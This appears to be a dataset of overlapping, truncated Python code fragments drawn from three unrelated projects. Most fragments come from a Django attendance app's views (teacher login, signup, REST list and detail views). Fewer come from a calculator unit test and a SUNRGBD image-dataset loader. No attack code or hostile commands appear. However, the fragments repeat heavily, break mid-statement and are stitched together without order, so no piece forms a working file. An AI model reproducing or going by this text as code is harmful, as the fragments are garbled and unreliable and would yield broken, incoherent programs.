"'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset",
"queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user)",
"serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer",
"import forms from django.views.generic import TemplateView from django.contrib.auth import logout, authenticate, login from",
"= request.POST['password'] user = authenticate(username=username, password=password) if user is not None: if user.is_active:",
"from django.views.generic import TemplateView from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import",
"username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user is",
"def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView):",
"def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self,",
"API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class=",
"get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer):",
"Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class",
"from rest_framework import generics from .models import Teacher, Student, Lecture, Div, Subject from",
"return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST",
"VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer",
"queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= DivSerializer def get_queryset(self): return Div.objects.all().filter(user=self.request.user)",
"logout, authenticate, login from django.contrib.auth.decorators import login_required from rest_framework import generics from .models",
"StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name =",
"'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request):",
"password=password) if user is not None: if user.is_active: login(request, user) return redirect('Attendance:dash') return",
"LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class=",
"class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name",
"request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user is not None:",
"@login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST': form",
"import login_required from rest_framework import generics from .models import Teacher, Student, Lecture, Div,",
"def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST': form =",
"class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= DivSerializer def get_queryset(self):",
"StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class=",
"StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def",
"rest_framework import generics from .models import Teacher, Student, Lecture, Div, Subject from .serializers",
"None: if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required",
"class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all()",
"def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView):",
"SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return",
"= form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form =",
"return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user)",
"REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer",
"= Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class",
"Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self):",
"authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html',",
"return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS ########################## class",
"########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def",
"django.urls import reverse_lazy from . import forms from django.views.generic import TemplateView from django.contrib.auth",
". import forms from django.views.generic import TemplateView from django.contrib.auth import logout, authenticate, login",
"if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def",
"'Attendance/login_success.html') def signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save()",
"redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def",
"django.shortcuts import render, redirect from django.urls import reverse_lazy from . import forms from",
"form}) ######################### REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all()",
"template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username = password = ''",
"= 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username",
"import logout, authenticate, login from django.contrib.auth.decorators import login_required from rest_framework import generics from",
"<gh_stars>0 from django.shortcuts import render, redirect from django.urls import reverse_lazy from . import",
"RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView):",
"ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username = password =",
"perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView):",
"django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import login_required from rest_framework import generics",
"is not None: if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form':",
"{'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset =",
"import reverse_lazy from . import forms from django.views.generic import TemplateView from django.contrib.auth import",
"user is not None: if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html',",
"get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class=",
"SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class=",
"return render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST) if",
"not None: if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()})",
"username = password = '' if request.POST: username = request.POST['username'] password = request.POST['password']",
"class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self):",
"from django.urls import reverse_lazy from . import forms from django.views.generic import TemplateView from",
"class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username = password",
"reverse_lazy from . import forms from django.views.generic import TemplateView from django.contrib.auth import logout,",
"dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST)",
"render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView):",
"LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user)",
"# username = password = '' if request.POST: username = request.POST['username'] password =",
"render, redirect from django.urls import reverse_lazy from . import forms from django.views.generic import",
"login from django.contrib.auth.decorators import login_required from rest_framework import generics from .models import Teacher,",
"request.POST['password'] user = authenticate(username=username, password=password) if user is not None: if user.is_active: login(request,",
"'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username = password = '' if request.POST:",
"form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user)",
"get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class=",
"TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class",
"password = '' if request.POST: username = request.POST['username'] password = request.POST['password'] user =",
"request.POST: username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user",
"TemplateView from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import login_required from rest_framework",
"if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>)",
"from . import forms from django.views.generic import TemplateView from django.contrib.auth import logout, authenticate,",
"django.contrib.auth.decorators import login_required from rest_framework import generics from .models import Teacher, Student, Lecture,",
"HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name =",
"StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset =",
"from django.shortcuts import render, redirect from django.urls import reverse_lazy from . import forms",
"= form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash')",
"serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset",
"= authenticate(username=username, password=password) if user is not None: if user.is_active: login(request, user) return",
"StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return",
"LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html'",
"authenticate, login from django.contrib.auth.decorators import login_required from rest_framework import generics from .models import",
"render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if",
"login_user_teacher(request): # logout(request) # username = password = '' if request.POST: username =",
"redirect from django.urls import reverse_lazy from . import forms from django.views.generic import TemplateView",
"Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name",
"serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset",
"password = request.POST['password'] user = authenticate(username=username, password=password) if user is not None: if",
"== 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password =",
"class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all()",
"forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username,",
"raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form",
"Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView):",
"def login_user_teacher(request): # logout(request) # username = password = '' if request.POST: username",
"Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name =",
"LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class",
"return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html')",
"return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer",
"class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView):",
"Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView):",
"######################### REST FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class=",
"context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method ==",
"forms from django.views.generic import TemplateView from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators",
"serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset",
"Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView):",
"= request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user is not",
"forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS ##########################",
"'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method",
"return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request):",
"queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer",
"Student, Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class",
"serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset =",
"SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView):",
"user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return",
"SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class",
"password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form':",
"class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all()",
"class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): #",
"SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset =",
"serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer",
"from .models import Teacher, Student, Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer,",
"logout(request) # username = password = '' if request.POST: username = request.POST['username'] password",
"= '' if request.POST: username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username,",
"Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def",
"= Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def",
"user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return render(request,",
"user = authenticate(username=username, password=password) if user is not None: if user.is_active: login(request, user)",
"serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer",
"get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class=",
"DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= DivSerializer def get_queryset(self): return",
"FRAMEWORK RELATED API VIEWS ########################## class TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class",
"template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html'",
"import TemplateView from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import login_required from",
"login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request): return"
] |
[
"from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self):",
"\"\"\" test case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be",
"MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test case to validate",
"suite for add class method import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase):",
"test case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\")",
"MyCalc() def test_add(self): \"\"\" test case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10,",
"two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\") if __name__ == '__main__':",
"for add class method import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def",
"def test_add(self): \"\"\" test case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5),",
"validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\") if __name__ ==",
"myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\"",
"def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test case to validate two",
"case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\") if",
"<filename>Chapter05/myunittest/tests/tests_mycalc/test_mycalc_add.py # test_mycalc_add.py test suite for add class method import unittest from myunittest.src.mycalc.mycalc",
"# test_mycalc_add.py test suite for add class method import unittest from myunittest.src.mycalc.mycalc import",
"MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test case",
"add class method import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self):",
"test_add(self): \"\"\" test case to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should",
"class method import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc",
"test suite for add class method import unittest from myunittest.src.mycalc.mycalc import MyCalc class",
"unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def",
"self.calc = MyCalc() def test_add(self): \"\"\" test case to validate two positive numbers\"\"\"",
"= MyCalc() def test_add(self): \"\"\" test case to validate two positive numbers\"\"\" self.assertEqual(15,",
"setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test case to validate two positive",
"to validate two positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\") if __name__",
"positive numbers\"\"\" self.assertEqual(15, self.calc.add(10, 5), \"should be 15\") if __name__ == '__main__': unittest.main()",
"method import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc =",
"import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test",
"class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc() def test_add(self): \"\"\" test case to",
"import unittest from myunittest.src.mycalc.mycalc import MyCalc class MyCalcAddTestSuite(unittest.TestCase): def setUp(self): self.calc = MyCalc()",
"test_mycalc_add.py test suite for add class method import unittest from myunittest.src.mycalc.mycalc import MyCalc"
] |
[
"def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def",
"Rtilt(self): return self._Rtilt @Rtilt.setter def Rtilt(self, Rtilt): self._Rtilt = Rtilt @property def K(self):",
"split): self._split = split @property def sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name):",
"@label.setter def label(self, label): self._label = label @property def img_name(self): return self._img_name @img_name.setter",
"7 end_ind = path.rfind('\\\\') - 1 rel_seq_path = path[start_ind:end_ind] data_path = os.path.join(params.dataset_path, 'SUNRGBD')",
"extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self):",
"return self._split @split.setter def split(self, split): self._split = split @property def sequence_name(self): return",
"self._img_name = img_name self._split = split self._sequence_name = None self._intrinsics = None self._extrinsics",
"\"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\"",
"rel_seq_path label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str) data_type = params.data_type if data_type == DataTypesSUNRGBD.RGB:",
"for k, v in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = []",
"in class_id_to_name.items()} class_names = set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name in",
"False def load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\')",
"path): self._path = path @property def label(self): return self._label @label.setter def label(self, label):",
"self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property def Rtilt(self): return self._Rtilt",
"set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name in names: _id = class_name_to_id[name]",
"names = [] for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names)",
"= params.data_type if data_type == DataTypesSUNRGBD.RGB: img_dir_name = 'image/' else: img_dir_name = 'depth/'",
"= [] for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def",
"@data_type.setter def data_type(self, data_type): self._data_type = data_type @property def path(self): return self._path @path.setter",
"= K def get_fullname(self): return self.label + '__' + self.sequence_name.replace('/', '_') + '_'",
"\"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id = {v: k for k, v",
"= label self._img_name = img_name self._split = split self._sequence_name = None self._intrinsics =",
"= 'depth/' img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path,",
"rel_seq_path sunrgbd_image.intrinsics = intrinsics sunrgbd_image.extrinsics = extrinsics return sunrgbd_image class SunRGBDImage: def __init__(self,",
"def load_props(params, path, split): start_ind = path.find('SUNRGBD') + 7 end_ind = path.rfind('\\\\') -",
"get_class_names(ids): names = [] for _id in ids: _name = class_id_to_name[str(_id)] names.append(_name) return",
"@property def extrinsics(self): return self._extrinsics @extrinsics.setter def extrinsics(self, extrinsics): self._extrinsics = extrinsics @property",
"as np from basic_utils import DataTypesSUNRGBD class_id_to_name = { \"0\": \"bathroom\", \"1\": \"bedroom\",",
"img_dir_name))[0] path = os.path.join(instance_path, img_dir_name+img_name) intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32) extrinsics = np.loadtxt(os.path.join(",
"def label(self, label): self._label = label @property def img_name(self): return self._img_name @img_name.setter def",
"sequence_name(self): return self._sequence_name @sequence_name.setter def sequence_name(self, sequence_name): self._sequence_name = sequence_name @property def intrinsics(self):",
"self._data_type = data_type @property def path(self): return self._path @path.setter def path(self, path): self._path",
"class SunRGBDImage: def __init__(self, data_type, img_name, path, label, split): self._data_type = data_type self._path",
"data_type @property def path(self): return self._path @path.setter def path(self, path): self._path = path",
"None self._intrinsics = None self._extrinsics = None self._Rtilt = None self._K = None",
"return self._intrinsics @intrinsics.setter def intrinsics(self, intrinsics): self._intrinsics = intrinsics @property def extrinsics(self): return",
"\"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\": \"study_space\" } class_name_to_id =",
"class_id_to_name[str(_id)] names.append(_name) return np.asarray(names) def _is_category_available(cat_name): for cat in class_names: if cat ==",
"ids = [] for name in names: _id = class_name_to_id[name] ids.append(_id) return np.asarray(ids,",
"\"12\": \"lab\", \"13\": \"lecture_theatre\", \"14\": \"library\", \"15\": \"living_room\", \"16\": \"office\", \"17\": \"rest_space\", \"18\":",
"\"5\": \"corridor\", \"6\": \"dining_area\", \"7\": \"dining_room\", \"8\": \"discussion_area\", \"9\": \"furniture_store\", \"10\": \"home_office\", \"11\":",
"= set(class_id_to_name.values()) def get_class_ids(names): ids = [] for name in names: _id =",
"data_type(self): return self._data_type @data_type.setter def data_type(self, data_type): self._data_type = data_type @property def path(self):",
